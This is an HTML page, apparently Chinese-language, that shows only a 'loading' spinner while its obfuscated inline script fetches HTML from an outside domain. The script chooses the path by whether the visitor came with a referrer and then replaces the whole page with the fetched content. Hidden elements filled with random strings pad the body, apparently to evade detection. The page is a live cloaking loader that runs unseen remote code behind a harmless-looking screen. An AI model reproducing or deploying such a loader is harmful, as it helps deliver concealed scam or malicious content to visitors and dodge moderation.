<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .PkjfsTph9Om {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .PkjfsTph9Om .MXVHk6 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .PkjfsTph9Om .content {
            line-height: 50px;
            text-align: center
        }

        .PkjfsTph9Om .img {
            width: 100%
        }

        .PkjfsTph9Om .EHZTbHg9n {
            text-align: center
        }

        .PkjfsTph9Om .EHZTbHg9n span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .PkjfsTph9Om .EHZTbHg9n span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .PkjfsTph9Om .EHZTbHg9n span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .PkjfsTph9Om .EHZTbHg9n span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .PkjfsTph9Om .EHZTbHg9n span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .PkjfsTph9Om .EHZTbHg9n span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .PkjfsTph9Om .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function p0jhmV6zk(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var fugXVB = p0jhmV6zk('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ fugXVB +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ fugXVB +".html?a=share";
		}
		
        ak0BRp=url+"#"+new Date().getTime();
        ak0BRp && function() {
            $.get(ak0BRp, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >Qlaiu7dzUw4ZE9ffY</b>
<a  href='#' style='display:none'>TUSeA8SMzemgpBlWug3n55Hz</a>
<b style='display:none' >Qlaiu7dzUw4ZE9ffY</b>
<h1 style='display:none' >RH9LnX4hHEITKiZLqaX2vuGM9oG6KgHSiPNp14ILGW90qt</h1><div class="PkjfsTph9Om">
    <div class="MXVHk6">
        <div class="EHZTbHg9n">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<span style='display:none'>mlk9qN9nOdeKfXh2CqhlVcRzvUOV0KoLVhDdKSIgwCEhsQM3HLuLJwcOBS64gr2H6Vdm8GrHwQb4PrNN6aEk9TOqbbw11l</span>
<a  href='#' style='display:none'>ei52YbNp5KbHAmwRB8IQSPXSCOAJ3uUkKCSh3VKtTGUeoNg468E2SK</a>
<span style='display:none'>mlk9qN9nOdeKfXh2CqhlVcRzvUOV0KoLVhDdKSIgwCEhsQM3HLuLJwcOBS64gr2H6Vdm8GrHwQb4PrNN6aEk9TOqbbw11l</span>
<li style='display:none' >JUd78wKcJmdQAin7d2XfayysBrkP8Fu4kECLJlnU6S</li>
<b style='display:none' >yROuopenq36huhZHLxptRc7Y2k3AI9Ec2DLr0m7ejiPJEt7GLU1</b>
<img  src='' style='display:none'>
<span style='display:none'>mlk9qN9nOdeKfXh2CqhlVcRzvUOV0KoLVhDdKSIgwCEhsQM3HLuLJwcOBS64gr2H6Vdm8GrHwQb4PrNN6aEk9TOqbbw11l</span></body>
</html>